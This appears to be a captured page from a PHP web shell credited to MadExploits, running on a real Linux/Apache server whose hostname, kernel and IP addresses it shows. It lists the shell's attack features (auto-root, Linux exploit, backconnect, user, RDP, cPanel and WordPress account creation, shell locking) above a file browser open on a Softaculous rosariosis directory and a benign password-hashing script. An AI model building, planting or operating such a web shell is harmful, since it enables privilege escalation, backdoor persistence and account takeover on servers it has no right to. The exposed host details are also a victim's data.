Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.144.224.30
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
rosariosis /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
3.76
KB
-rw-r--r--
config.inc.php
2.06
KB
-rw-r--r--
edit.php
5.06
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
690
B
-rw-r--r--
import.php
3.07
KB
-rw-r--r--
info.xml
1.96
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
7.79
KB
-rw-r--r--
install.xml
1.22
KB
-rw-r--r--
md5
4.54
KB
-rw-r--r--
notes.txt
1.23
KB
-rw-r--r--
update_pass.php
228
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update_pass.php
<?php $rand = rand( 999999999, 9999999999 ); $salt = '$6$' . mb_substr( sha1( $rand ), 0, 16 ); $resp = crypt( (string) '[[admin_pass]]', $salt ); echo '<update_pass>'.$resp.'</update_pass>'; @unlink('update_pass.php'); ?>
Close